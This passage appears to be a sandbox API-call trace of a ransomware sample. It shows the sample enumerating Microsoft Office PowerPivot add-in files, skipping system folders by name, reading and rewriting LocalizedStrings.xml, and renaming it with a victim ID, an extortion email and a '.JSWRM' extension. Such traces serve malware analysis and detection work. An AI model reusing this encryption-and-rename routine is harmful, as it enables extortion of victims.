WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241218, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0126.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\es\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.450] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4405) returned 1 [0126.450] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1130) returned 0x278330 [0126.450] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1130, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1130, lpOverlapped=0x0) returned 1 [0126.454] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.454] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1130, lpOverlapped=0x0) returned 1 [0126.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.455] CloseHandle (hObject=0x338) returned 1 [0126.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0126.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0126.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0126.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0126.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0126.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.455] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\es\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\es\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0126.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0126.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0126.456] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c63313, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c63313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c63313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd028, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.456] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0126.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0126.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0126.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0126.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e458 [0126.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.457] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8719376, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38af0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.457] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0126.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.458] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf803d796, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d578, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0126.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.458] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1bf45a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bf45a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bf45a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x200030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.458] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dde8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0126.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d578, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0126.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0126.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0126.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.459] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3038, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.459] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0126.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0126.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0126.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0126.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0126.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: 